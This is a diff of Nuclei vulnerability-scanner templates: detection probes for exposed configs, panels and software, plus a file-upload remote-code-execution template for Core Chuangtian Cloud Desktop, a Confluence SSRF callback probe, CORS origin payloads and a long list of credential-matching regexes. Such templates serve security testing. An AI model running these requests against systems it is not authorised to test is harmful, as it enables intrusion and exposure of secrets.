- dsl:
- - cname
-
+
http:
- method: GET
path:
- - "{{BaseURL}}?ref={{cname}}"
+ - "{{BaseURL}}"
matchers:
- type: word
diff --git a/nuclei-templates/Other/config-parameters-yml.yaml b/nuclei-templates/Other/config-parameters-yml.yaml
deleted file mode 100644
index f98a8c8c5f..0000000000
--- a/nuclei-templates/Other/config-parameters-yml.yaml
+++ /dev/null
@@ -1,20 +0,0 @@
-id: custom-config-check
-
-info:
- name: Config File Check
- author: SirBugs
- severity: high
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/config/const.DB.php.bak"
-
- matchers:
- - type: word
- condition: or
- words:
- - "DBHOST"
- - "DBUSER"
- - "DBPASS"
- - "DBNAME"
diff --git a/nuclei-templates/Other/config-rb-1179.yaml b/nuclei-templates/Other/config-rb-1179.yaml
new file mode 100644
index 0000000000..13374d3a06
--- /dev/null
+++ b/nuclei-templates/Other/config-rb-1179.yaml
@@ -0,0 +1,30 @@
+id: config-rb
+
+info:
+ name: Config Ruby File Disclosure
+ author: DhiyaneshDK
+ severity: unknown
+ metadata:
+ verified: true
+ shodan-query: html:"config.rb"
+ tags: ruby,devops,exposure,config
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/config.rb"
+ - "{{BaseURL}}/.chef/config.rb"
+ - "{{BaseURL}}/assets/config.rb"
+
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'images_dir'
+ - 'css_dir'
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/Other/config-rb.yaml b/nuclei-templates/Other/config-rb.yaml
deleted file mode 100644
index bca422d776..0000000000
--- a/nuclei-templates/Other/config-rb.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-id: config-rb
-info:
- name: Config Ruby File Disclosure
- author: DhiyaneshDK
- severity: medium
- metadata:
- verified: true
- shodan-query: html:"config.rb"
- tags: ruby,devops,exposure,config
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/config.rb"
- - "{{BaseURL}}/.chef/config.rb"
- - "{{BaseURL}}/assets/config.rb"
- stop-at-first-match: true
- matchers-condition: and
- matchers:
- - type: word
- words:
- - 'images_dir'
- - 'css_dir'
- condition: and
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/Other/configuration-listing-1181.yaml b/nuclei-templates/Other/configuration-listing-1182.yaml
similarity index 100%
rename from nuclei-templates/Other/configuration-listing-1181.yaml
rename to nuclei-templates/Other/configuration-listing-1182.yaml
diff --git a/nuclei-templates/Other/confluence-detect-1186.yaml b/nuclei-templates/Other/confluence-detect-1186.yaml
deleted file mode 100644
index ba239b67f4..0000000000
--- a/nuclei-templates/Other/confluence-detect-1186.yaml
+++ /dev/null
@@ -1,41 +0,0 @@
-id: confluence-detect
-
-info:
- name: Confluence Detect
- author: philippedelteil
- severity: info
- description: Allows you to detect Atlassian Confluence instances
- tags: tech,confluence,atlassian
- metadata:
- shodan-query: https://www.shodan.io/search?query=http.component%3A%22atlassian+confluence%22
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}"
- - "{{BaseURL}}/pages"
- - "{{BaseURL}}/confluence"
- - "{{BaseURL}}/wiki"
-
- redirects: true
- stop-at-first-match: true
- matchers-condition: and
- matchers:
- - type: word
- words:
- - '-Confluence-'
- - '-confluence-'
- part: header
- condition: or
-
- - type: word
- words:
- - 'confluence-base-url'
- part: body
-
- extractors:
- - type: regex
- part: body
- group: 1
- regex:
- - 'Atlassian Confluence ([a-z0-9-._]+)'
diff --git a/nuclei-templates/Other/confluence-detect-1189.yaml b/nuclei-templates/Other/confluence-detect-1189.yaml
new file mode 100644
index 0000000000..b860a53f8f
--- /dev/null
+++ b/nuclei-templates/Other/confluence-detect-1189.yaml
@@ -0,0 +1,41 @@
+id: confluence-detect
+
+info:
+ name: Confluence Detect
+ author: philippedelteil
+ severity: info
+ description: Allows you to detect Atlassian Confluence instances
+ metadata:
+ shodan-query: http.component:"Atlassian Confluence"
+ tags: tech,confluence,atlassian
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+ - "{{BaseURL}}/pages"
+ - "{{BaseURL}}/confluence"
+ - "{{BaseURL}}/wiki"
+
+ redirects: true
+ stop-at-first-match: true
+ matchers-condition: or
+ matchers:
+ - type: word
+ part: header
+ words:
+ - '-confluence-'
+ case-insensitive: true
+
+ - type: word
+ part: body
+ words:
+ - 'confluence-base-url'
+
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - ''
+ - 'Atlassian Confluence ([a-z0-9-._]+)'
\ No newline at end of file
diff --git a/nuclei-templates/Other/confluence-ssrf-sharelinks-1191.yaml b/nuclei-templates/Other/confluence-ssrf-sharelinks-1191.yaml
new file mode 100644
index 0000000000..7454f8abc5
--- /dev/null
+++ b/nuclei-templates/Other/confluence-ssrf-sharelinks-1191.yaml
@@ -0,0 +1,19 @@
+id: confluence-ssrf-sharelinks
+info:
+ name: Confluence SSRF in sharelinks
+ author: TechbrunchFR
+ severity: medium
+ description: Vulnerable should be Confluence versions released from 2016 November and older
+ reference: |
+ - https://bitbucket.org/atlassian/confluence-business-blueprints/pull-requests/144/issue-60-conf-45342-ssrf-in-sharelinks
+ - https://github.com/assetnote/blind-ssrf-chains#confluence
+ tags: confluence,atlassian,ssrf,jira,oob
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/rest/sharelinks/1.0/link?url=https://{{interactsh-url}}/'
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
+ words:
+ - "http"
diff --git a/nuclei-templates/Other/confluence-ssrf-sharelinks.yaml b/nuclei-templates/Other/confluence-ssrf-sharelinks.yaml
deleted file mode 100644
index a96384ee50..0000000000
--- a/nuclei-templates/Other/confluence-ssrf-sharelinks.yaml
+++ /dev/null
@@ -1,39 +0,0 @@
-id: confluence-ssrf-sharelinks
-info:
- name: Atlassian Confluence < 5.8.6 Server-Side Request Forgery
- author: TechbrunchFR
- severity: medium
- description: Atlassian Confluence < 5.8.6 is affected by a blind server-side request forgery vulnerability in the widgetconnector plugin.
- reference:
- - https://bitbucket.org/atlassian/confluence-business-blueprints/pull-requests/144/issue-60-conf-45342-ssrf-in-sharelinks
- - https://github.com/assetnote/blind-ssrf-chains#confluence
- - https://nvd.nist.gov/vuln/detail/CVE-2021-26072
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N
- cvss-score: 6.8
- cwe-id: CWE-918
- remediation: Upgrade to Atlassian Confluence version 5.8.6 or later.
- metadata:
- shodan-query: http.component:"Atlassian Confluence"
- tags: confluence,atlassian,ssrf,oast
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/rest/sharelinks/1.0/link?url=https://{{interactsh-url}}/'
- matchers-condition: and
- matchers:
- - type: word
- part: interactsh_protocol # Confirms the HTTP Interaction
- words:
- - "http"
- - type: word
- part: body
- words:
- - "faviconURL"
- - "domain"
- condition: and
- - type: status
- status:
- - 200
-
-# Enhanced by mp on 2022/04/14
diff --git a/nuclei-templates/Other/const-DB-php-bak.yaml b/nuclei-templates/Other/const-DB-php-bak.yaml
new file mode 100644
index 0000000000..d5c7d7c421
--- /dev/null
+++ b/nuclei-templates/Other/const-DB-php-bak.yaml
@@ -0,0 +1,22 @@
+id: custom-config-check
+
+info:
+ name: DataBase Configuration Check
+ author: SirBugs
+ severity: Critical
+ description: Check for common database configuration keys.
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/config/parameters.yml"
+
+ matchers:
+ - type: word
+ words:
+ - "database_driver"
+ - "database_host"
+ - "database_port"
+ - "database_name"
+ - "database_password"
+ part: body
diff --git a/nuclei-templates/Other/content-scheme-1205.yaml b/nuclei-templates/Other/content-scheme-1205.yaml
new file mode 100644
index 0000000000..2a4c7d0bf7
--- /dev/null
+++ b/nuclei-templates/Other/content-scheme-1205.yaml
@@ -0,0 +1,15 @@
+id: content-scheme
+
+info:
+ name: Content Scheme Enabled
+ author: gaurang
+ severity: info
+
+file:
+ - extensions:
+ - xml
+
+ matchers:
+ - type: word
+ words:
+ - "android:scheme=\"content\""
\ No newline at end of file
diff --git a/nuclei-templates/Other/content-scheme.yaml b/nuclei-templates/Other/content-scheme.yaml
deleted file mode 100644
index f60d6a6607..0000000000
--- a/nuclei-templates/Other/content-scheme.yaml
+++ /dev/null
@@ -1,16 +0,0 @@
-id: content-scheme
-
-info:
- name: Content Scheme Enabled
- author: gaurang
- severity: info
- tags: android,file
-
-file:
- - extensions:
- - xml
-
- matchers:
- - type: word
- words:
- - "android:scheme=\"content\""
\ No newline at end of file
diff --git a/nuclei-templates/Other/contentkeeper-detect-1203.yaml b/nuclei-templates/Other/contentkeeper-detect-1203.yaml
deleted file mode 100644
index b5b6a8daf5..0000000000
--- a/nuclei-templates/Other/contentkeeper-detect-1203.yaml
+++ /dev/null
@@ -1,31 +0,0 @@
-id: contentkeeper-detect
-
-info:
- name: ContentKeeper Cloud Detection
- author: geeknik
- severity: info
- description: ContentKeeper Cloud is the next evolution of cloud filtering that provides schools a seamless and secure way to enable safer and more effective hybrid learning.
- reference: https://www.contentkeeper.com/
- tags: contentkeeper,panel
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/cgi-bin/ck/domenu.cgi"
-
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
-
- - type: word
- words:
- - "ContentKeeper Technologies "
- - "ContentKeeper.com"
- condition: and
-
- - type: word
- words:
- - "text/html"
- part: header
diff --git a/nuclei-templates/Other/contentkeeper-detect.yaml b/nuclei-templates/Other/contentkeeper-detect.yaml
new file mode 100644
index 0000000000..c7507a5657
--- /dev/null
+++ b/nuclei-templates/Other/contentkeeper-detect.yaml
@@ -0,0 +1,32 @@
+id: contentkeeper-detect
+
+info:
+ name: ContentKeeper Cloud Detection
+ author: geeknik
+ severity: info
+ description: ContentKeeper Cloud is the next evolution of cloud filtering that provides schools a seamless and secure way to enable safer and more effective hybrid learning.
+ reference:
+ - https://www.contentkeeper.com/
+ tags: contentkeeper,panel
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/cgi-bin/ck/domenu.cgi"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ContentKeeper Technologies "
+ - "ContentKeeper.com"
+ condition: and
+
+ - type: word
+ words:
+ - "text/html"
+ part: header
diff --git a/nuclei-templates/Other/core-chuangtian-cloud-rce-1207.yaml b/nuclei-templates/Other/core-chuangtian-cloud-rce-1207.yaml
new file mode 100644
index 0000000000..aaf11e8f29
--- /dev/null
+++ b/nuclei-templates/Other/core-chuangtian-cloud-rce-1207.yaml
@@ -0,0 +1,41 @@
+id: core-chuangtian-cloud-rce
+info:
+ name: Core Chuangtian Cloud Desktop System - Remote Code Execution
+ author: pikpikcu
+ severity: critical
+ description: Core Chuangtian Cloud Desktop System is susceptible to remote code execution vulnerabilities.
+ reference:
+ - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10.0
+ cwe-id: CWE-77
+ tags: rce
+requests:
+ - raw:
+ - |
+ POST /Upload/upload_file.php?l=test HTTP/1.1
+ Host: {{Hostname}}
+ Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
+ Accept-Encoding: gzip, deflate
+ Cookie: think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6
+ Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv
+
+ ------WebKitFormBoundaryfcKRltGv
+ Content-Disposition: form-data; name="file"; filename="test.php"
+ Content-Type: image/avif
+
+
+ ------WebKitFormBoundaryfcKRltGv--
+ - |
+ GET /Upload/test/test.php HTTP/1.1
+ Host: {{Hostname}}
+ req-condition: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(body_2, "PHP Version")'
+ - 'status_code_2 == 200'
+ condition: and
+
+# Enhanced by mp on 2022/06/01
diff --git a/nuclei-templates/Other/core-chuangtian-cloud-rce-1209.yaml b/nuclei-templates/Other/core-chuangtian-cloud-rce-1209.yaml
deleted file mode 100644
index 4d3b5476df..0000000000
--- a/nuclei-templates/Other/core-chuangtian-cloud-rce-1209.yaml
+++ /dev/null
@@ -1,34 +0,0 @@
-id: core-chuangtian-cloud-rce
-info:
- name: Core Chuangtian Cloud Desktop System RCE
- author: pikpikcu
- severity: critical
- reference:
- - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
- tags: rce
-requests:
- - raw:
- - |
- POST /Upload/upload_file.php?l=test HTTP/1.1
- Host: {{Hostname}}
- Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
- Accept-Encoding: gzip, deflate
- Cookie: think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6
- Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv
-
- ------WebKitFormBoundaryfcKRltGv
- Content-Disposition: form-data; name="file"; filename="test.php"
- Content-Type: image/avif
-
-
- ------WebKitFormBoundaryfcKRltGv--
- - |
- GET /Upload/test/test.php HTTP/1.1
- Host: {{Hostname}}
- req-condition: true
- matchers:
- - type: dsl
- dsl:
- - 'contains(body_2, "PHP Version")'
- - 'status_code_2 == 200'
- condition: and
diff --git a/nuclei-templates/Other/coremail-config-disclosure-1214.yaml b/nuclei-templates/Other/coremail-config-disclosure-1214.yaml
index 81e5a59217..9fec1f1d7c 100644
--- a/nuclei-templates/Other/coremail-config-disclosure-1214.yaml
+++ b/nuclei-templates/Other/coremail-config-disclosure-1214.yaml
@@ -3,7 +3,8 @@ info:
name: Coremail Config Disclosure
author: princechaddha
severity: high
- reference: https://www.secpulse.com/archives/107611.html
+ reference:
+ - https://www.secpulse.com/archives/107611.html
tags: config,exposure
requests:
- method: GET
diff --git a/nuclei-templates/Other/cors-misconfig-1224.yaml b/nuclei-templates/Other/cors-misconfig-1224.yaml
deleted file mode 100644
index 8e0a589bac..0000000000
--- a/nuclei-templates/Other/cors-misconfig-1224.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: cors-misconfig
-info:
- name: CORS Misconfiguration
- author: coffin
- severity: high
- tags: cors,generic,misconfig
-
-http:
- - raw:
- - |
- GET HTTP/1.1
- Host: {{Hostname}}
- Origin: {{cors_origin}}
-
- payloads:
- cors_origin:
- - "https://{{tolower(rand_base(5))}}.{{RDN}}" # Find domain in RDN with Misconfiguration
- stop-at-first-match: true
- matchers:
- - type: dsl
- name: arbitrary-origin
- dsl:
- - "contains(tolower(header), 'access-control-allow-origin: {{cors_origin}}')"
- - "contains(tolower(header), 'access-control-allow-credentials: true')"
- condition: and
diff --git a/nuclei-templates/Other/cors.yaml b/nuclei-templates/Other/cors.yaml
new file mode 100644
index 0000000000..0c21683c10
--- /dev/null
+++ b/nuclei-templates/Other/cors.yaml
@@ -0,0 +1,40 @@
+id: cors-misconfig
+
+info:
+ name: CORS Misconfiguration
+ author: nadino,g4l1t0,convisoappsec,pdteam,breno_css
+ severity: info
+ reference:
+ - https://portswigger.net/web-security/cors
+ - https://www.corben.io/advanced-cors-techniques/
+ - https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/
+ tags: cors,generic,misconfig
+
+requests:
+ - raw:
+ - |
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{cors_origin}}
+
+ payloads:
+ cors_origin:
+ - "https://{{tolower(rand_base(5))}}{{RDN}}" # Arbitrary domain
+ - "https://{{tolower(rand_base(5))}}.com" # Arbitrary domain
+ - "https://{{FQDN}}.{{tolower(rand_base(5))}}.com" # Arbitrary domain
+ - "https://{{FQDN}}{{tolower(rand_base(5))}}.com" # Arbitrary domain
+ - "https://{{FQDN}}_.{{tolower(rand_base(5))}}.com" # Arbitrary domain
+ - "https://{{FQDN}}%60.{{tolower(rand_base(5))}}.com" # Arbitrary domain
+ - "null" # null origin
+ - "https://{{tolower(rand_base(5))}}.{{RDN}}" # Arbitrary subdomain
+ - "http://{{tolower(rand_base(5))}}.{{RDN}}" # Arbitrary subdomain over http
+
+ stop-at-first-match: true
+ matchers-condition: or
+ matchers:
+ - type: dsl
+ name: arbitrary-origin
+ dsl:
+ - "contains(tolower(all_headers), 'access-control-allow-origin: {{cors_origin}}')"
+ - "contains(tolower(all_headers), 'access-control-allow-credentials: true')"
+ condition: and
\ No newline at end of file
diff --git a/nuclei-templates/Other/cortex-xsoar-login-1225.yaml b/nuclei-templates/Other/cortex-xsoar-login-1225.yaml
new file mode 100644
index 0000000000..36c5ec3819
--- /dev/null
+++ b/nuclei-templates/Other/cortex-xsoar-login-1225.yaml
@@ -0,0 +1,23 @@
+id: cortex-xsoar-login
+
+info:
+ name: Cortex XSOAR Login Panel
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.shodan.io/search?query=http.title%3A%22Cortex+XSOAR%22
+ tags: panel,soar,login
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/#/login'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Cortex XSOAR'
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/Other/cortex-xsoar-login-1227.yaml b/nuclei-templates/Other/cortex-xsoar-login-1227.yaml
deleted file mode 100644
index 5151fc8bfa..0000000000
--- a/nuclei-templates/Other/cortex-xsoar-login-1227.yaml
+++ /dev/null
@@ -1,24 +0,0 @@
-id: cortex-xsoar-login
-
-info:
- name: Cortex XSOAR Login Panel
- author: dhiyaneshDK
- severity: info
- metadata:
- shodan-query: http.title:"Cortex XSOAR"
- tags: panel,soar,login
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/#/login'
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - 'Cortex XSOAR'
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/Other/couchbase-buckets-api.yaml b/nuclei-templates/Other/couchbase-buckets-api.yaml
index 37dba5b3ce..124887fab9 100644
--- a/nuclei-templates/Other/couchbase-buckets-api.yaml
+++ b/nuclei-templates/Other/couchbase-buckets-api.yaml
@@ -1,33 +1,33 @@
-id: couchbase-buckets-api
-
-info:
- name: Couchbase Buckets REST API - Unauthenticated
- author: geeknik
- severity: info
- reference:
- - https://docs.couchbase.com/server/current/rest-api/rest-bucket-intro.html
- - https://www.elastic.co/guide/en/beats/metricbeat/current/metricbeat-metricset-couchbase-bucket.html
- tags: exposure,couchbase
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/pools/default/buckets"
-
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
-
- - type: word
- words:
- - '"couchbase":'
- - '"bucket":'
- - '"data":'
- condition: and
-
- - type: word
- part: header
- words:
- - 'application/json'
+id: couchbase-buckets-api
+
+info:
+ name: Couchbase Buckets REST API - Unauthenticated
+ author: geeknik
+ severity: info
+ reference:
+ - https://docs.couchbase.com/server/current/rest-api/rest-bucket-intro.html
+ - https://www.elastic.co/guide/en/beats/metricbeat/current/metricbeat-metricset-couchbase-bucket.html
+ tags: exposure,couchbase
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/pools/default/buckets"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - '"couchbase":'
+ - '"bucket":'
+ - '"data":'
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - 'application/json'
diff --git a/nuclei-templates/Other/couchdb-adminparty-1235.yaml b/nuclei-templates/Other/couchdb-adminparty-1235.yaml
new file mode 100644
index 0000000000..a7af445594
--- /dev/null
+++ b/nuclei-templates/Other/couchdb-adminparty-1235.yaml
@@ -0,0 +1,28 @@
+id: couchdb-adminparty
+
+info:
+ name: CouchDB Admin Party
+ author: organiccrap
+ severity: high
+ description: Requests made against CouchDB are done in the context of an admin user.
+ tags: couchdb
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/_users/_all_docs'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - CouchDB/
+ - Erlang OTP/
+ part: header
+ condition: and
+ - type: word
+ words:
+ - total_rows
+ - offset
+ part: body
+ condition: and
diff --git a/nuclei-templates/Other/couchdb-adminparty.yaml b/nuclei-templates/Other/couchdb-adminparty.yaml
deleted file mode 100644
index cf02787c9e..0000000000
--- a/nuclei-templates/Other/couchdb-adminparty.yaml
+++ /dev/null
@@ -1,28 +0,0 @@
-id: couchdb-adminparty
-
-info:
- name: CouchDB Admin Party
- author: organiccrap
- severity: high
- description: Requests made against CouchDB are done in the context of an admin user.
- tags: couchdb
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/_users/_all_docs'
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - CouchDB/
- - Erlang OTP/
- part: header
- condition: and
- - type: word
- words:
- - total_rows
- - offset
- part: body
- condition: and
diff --git a/nuclei-templates/Other/couchdb-fauxton-1242.yaml b/nuclei-templates/Other/couchdb-fauxton-1242.yaml
deleted file mode 100644
index ec99210c94..0000000000
--- a/nuclei-templates/Other/couchdb-fauxton-1242.yaml
+++ /dev/null
@@ -1,17 +0,0 @@
-id: couchdb-fauxton
-
-info:
- name: Apache CouchDB Fauxton Exposure
- author: pdteam
- severity: low
- tags: panel,apache,couchdb
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}'
-
- matchers:
- - type: word
- words:
- - 'Project Fauxton'
diff --git a/nuclei-templates/Other/couchdb-fauxton-1244.yaml b/nuclei-templates/Other/couchdb-fauxton-1244.yaml
new file mode 100644
index 0000000000..5ca46a8540
--- /dev/null
+++ b/nuclei-templates/Other/couchdb-fauxton-1244.yaml
@@ -0,0 +1,17 @@
+id: couchdb-fauxton
+
+info:
+ name: Apache CouchDB Fauxton Exposure
+ author: pdteam
+ severity: low
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+
+ matchers:
+ - type: word
+ words:
+ - 'Project Fauxton'
\ No newline at end of file
diff --git a/nuclei-templates/Other/craft-cms-detect-1247.yaml b/nuclei-templates/Other/craft-cms-detect-1247.yaml
new file mode 100644
index 0000000000..16dc55c1bf
--- /dev/null
+++ b/nuclei-templates/Other/craft-cms-detect-1247.yaml
@@ -0,0 +1,28 @@
+id: craft-cms-detect
+
+info:
+ name: Craft CMS Detect
+ author: skeltavik
+ severity: info
+ description: Detects Craft CMS
+ reference:
+ - https://craftcms.com
+ tags: tech,craftcms
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+
+ redirects: true
+ max-redirects: 2
+ matchers:
+ - type: word
+ part: header
+ words:
+ - 'X-Powered-By: Craft CMS'
+
+ - type: regex
+ part: header
+ regex:
+ - 'Set-Cookie: (Craft|CRAFT)'
diff --git a/nuclei-templates/Other/craft-cms-detect.yaml b/nuclei-templates/Other/craft-cms-detect.yaml
deleted file mode 100644
index 5c060a9d32..0000000000
--- a/nuclei-templates/Other/craft-cms-detect.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: craft-cms-detect
-
-info:
- name: Craft CMS Detect
- author: skeltavik
- severity: info
- description: Detects Craft CMS
- reference: https://craftcms.com
- tags: tech,craftcms
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}'
-
- redirects: true
- max-redirects: 2
- matchers:
- - type: word
- part: header
- words:
- - 'X-Powered-By: Craft CMS'
-
- - type: regex
- part: header
- regex:
- - 'Set-Cookie: (Craft|CRAFT)'
diff --git a/nuclei-templates/Other/craftcms-admin-panel-1245.yaml b/nuclei-templates/Other/craftcms-admin-panel.yaml
similarity index 100%
rename from nuclei-templates/Other/craftcms-admin-panel-1245.yaml
rename to nuclei-templates/Other/craftcms-admin-panel.yaml
diff --git a/nuclei-templates/Other/credential-exposure-file.yaml b/nuclei-templates/Other/credential-exposure-file.yaml
index 543b6f5325..732ad44e81 100644
--- a/nuclei-templates/Other/credential-exposure-file.yaml
+++ b/nuclei-templates/Other/credential-exposure-file.yaml
@@ -12,15 +12,11 @@ id: credentials-disclosure-file
info:
name: Credentials Disclosure Check
- author: Sy3Omda,geeknik,forgedhallpass
+ author: Sy3Omda,geeknik
severity: info
description: Look for multiple keys/tokens/passwords hidden inside of files.
tags: exposure,token,file,disclosure
-# The regexes are copied from exposures/tokens/generic/credentials-disclosure.yaml
-# TODO After https://github.com/projectdiscovery/nuclei/issues/1510 is implemented, we should be able to re-use them, instead of duplicating
-# Example cases to match against: https://regex101.com/r/HPtaU2/1
-
file:
- extensions:
- all
@@ -29,692 +25,691 @@ file:
- type: regex
part: body
regex:
- - "(?i)[\"']?zopim[_-]?account[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?zhuliang[_-]?gh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?zensonatypepassword[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?zendesk[_-]?travis[_-]?github[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?yt[_-]?server[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?yt[_-]?partner[_-]?refresh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?yt[_-]?partner[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?yt[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?yt[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?yt[_-]?account[_-]?refresh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?yt[_-]?account[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?yangshun[_-]?gh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?yangshun[_-]?gh[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?www[_-]?googleapis[_-]?com[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?wpt[_-]?ssh[_-]?private[_-]?key[_-]?base64[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?wpt[_-]?ssh[_-]?connect[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?wpt[_-]?report[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?wpt[_-]?prepare[_-]?dir[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?wpt[_-]?db[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?wpt[_-]?db[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?wporg[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?wpjm[_-]?phpunit[_-]?google[_-]?geocode[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?wordpress[_-]?db[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?wordpress[_-]?db[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?wincert[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?widget[_-]?test[_-]?server[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?widget[_-]?fb[_-]?password[_-]?3[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?widget[_-]?fb[_-]?password[_-]?2[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?widget[_-]?fb[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?widget[_-]?basic[_-]?password[_-]?5[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?widget[_-]?basic[_-]?password[_-]?4[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?widget[_-]?basic[_-]?password[_-]?3[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
